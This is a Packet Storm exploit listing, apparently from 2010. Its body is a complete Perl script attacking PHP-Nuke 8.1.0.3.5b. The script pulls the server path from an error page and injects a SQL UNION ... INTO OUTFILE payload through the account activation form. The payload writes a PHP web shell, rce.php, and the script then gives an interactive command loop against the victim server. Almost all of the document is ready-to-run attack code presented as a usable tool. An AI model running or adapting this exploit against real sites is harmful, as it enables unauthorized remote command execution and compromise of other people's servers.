PHP-Nuke 8.1.0.3.5b Command Execution

2010-07-13T00:00:00
ID PACKETSTORM:91670
Type packetstorm
Reporter Dante90
Modified 2010-07-13T00:00:00

Description

                                        
                                            `# PHP-Nuke <= 8.1.0.3.5b Remote Command Execution Exploit  
# Author/s: Dante90 & yawn  
# Contact Us: www.unitx.net  
# Requirements: magic_quotes_gpc : off  
# Greetings: #0day@irc.iside.us | #Unit-X@irc.unitx.net  
  
# You will remember, Watson, how the dreadful business of the  
# Abernetty family was first brought to my notice by the depth which the  
# parsley had sunk into the butter upon a hot day.  
# -- Sherlock Holmes  
  
use strict;  
use warnings;  
use LWP::UserAgent;  
use HTTP::Cookies;  
  
sub Nuke::Usage {  
print " \n [0-Day] PHP-Nuke <= 8.1.0.3.5b Remote Command Execution Exploit\n";  
print " ------------------------------------------------------ \n";  
print " * USAGE: *\n";  
print " * cd [Local Disk]:\\ *\n";  
print " * perl name_exploit.pl [host] [username] [password] *\n";  
print " * -> REMEMBER TO ADD THE FINAL / TO THE HOSTNAME <- *\n";  
print " ------------------------------------------------------ \n";  
print " * Powered By Dante90 & yawn *\n";  
print " * www.unitx.net *\n";  
print " ------------------------------------------------------ \n";  
}  
  
#VARS  
system $^O eq 'MSWin32' ? 'cls' : 'clear';  
Nuke::Usage();  
my $host = shift || die;  
my $cmd;  
my $shell = "<?php echo system(\$_GET[\"cmd\"]); ?>"; # Change Here to  
Set your custom shell (for example use system() );  
my $cookies = HTTP::Cookies->new;  
my $request = LWP::UserAgent->new;  
$request->agent("Mozilla 5/0");  
$request->cookie_jar($cookies);  
#END VARS  
sub Full_Path_Disclosure() {  
my $Get = $request->get($host.'themes/NukeNews/theme.php');  
if ($Get->content =~ /No such file or directory in <b>(.+?)<\/b> on line/i) {  
return $1;  
} else {  
return "failed";  
}  
}  
  
print " * Getting Full Path\n";  
my $path = Full_Path_Disclosure();  
die " * Failed Path Extraction" if ($path eq "failed");  
$path =~ s/themes(\/|\\)NukeNews(\/|\\)theme.php//g;  
print " * Full Path Found: $path\n";  
if ($path =~ m/\\/) {  
$path =~ s/\\/\\\\\\\\/g;  
}  
print " * Injecting Shell To $host\n";  
my $req2= $request->post($host."modules.php?name=Your_Account&op=activate&username=WTF",  
{  
check_num => "'UNION/**/SELECT 1,2,3,4,5,6,'".$shell."' FROM  
`nuke_authors` INTO OUTFILE '$path"."rce.php",  
},  
Referer => $host."index.php");  
print " * Injecting Successfully Completed\n";  
print " * Shell now available on $host"."rce.php\n";  
print " * Connecting to remote shell\n";  
sleep(4);  
print " * Connected.. Type \"quit\" to quit\n";  
while() {  
print "* root\@backdoor ~\$ ";  
$cmd = <>;  
chomp($cmd);  
last if $cmd eq "quit";  
$req2 = $request->get($host."/rce.php?cmd=".$cmd);  
print $req2->content."\n";  
}  
  
`